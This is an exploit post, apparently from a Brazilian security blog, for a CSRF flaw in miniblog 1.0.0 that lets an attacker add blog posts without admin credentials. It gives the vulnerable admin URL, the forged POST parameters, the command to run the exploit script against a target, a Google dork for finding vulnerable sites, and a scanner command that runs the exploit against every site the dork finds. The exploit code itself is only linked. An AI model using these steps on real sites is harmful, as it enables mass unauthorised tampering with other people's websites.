[+] Discoverer Author: Mustafa Moshkela
REF COD POC: http://www.exploit4arab.net/exploits/1482
Greets to: all members in iq-team.org
Script makes a post without administrative credentials.
------------------------------------------------------------------------------
# SCRIPT by: [ I N U R L - B R A S I L ] - [ By GoogleINURL ] # EXPLOIT NAME: XPL miniblog 1.0.0 CSRF 4ADD post / INURL BRASIL # AUTOR: Cleiton Pinheiro / Nick: googleINURL # Email: [email protected] # Blog: http://blog.inurl.com.br # Twitter: https://twitter.com/googleinurl # Fanpage: https://fb.com/InurlBrasil # Pastebin http://pastebin.com/u/Googleinurl # GIT: https://github.com/googleinurl # PSS: http://packetstormsecurity.com/user/googleinurl # YOUTUBE: http://youtube.com/c/INURLBrasil # PLUS: http://google.com/+INURLBrasil
------------------------------------------------------------------------------
# Vendor: http://www.spyka.net/scripts/php/miniblo
# Google Dork: intext:"Powered by miniblog" ext:php
# POC: http://{YOU_URL}/adm/admin.php?mode=add
# SEND REQUEST POST: adddata[post_title]=TITLE&data[post_content]=<b>YOU_POST</b>&data[published]=1&miniblog_PostBack=Add
# EXECUTE: php xpl.php -t http://target.us
# FILE_OUTPUT: miniblog_vuln.txt
# EXPLOIT: http://pastebin.com/xPq4i95F
------------------------------------------------------------------------------
# EXPLOIT MASS USE SCANNER INURLBRphp inurlbr.php --dork 'intext:"Powered by miniblog" ext:php' -s output.txt --command-all 'php xpl.php -t _TARGET_'
More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR
------------------------------------------------------------------------------
OUTPUT SCAN EXEC:
Nenhum comentário:
Postar um comentário
............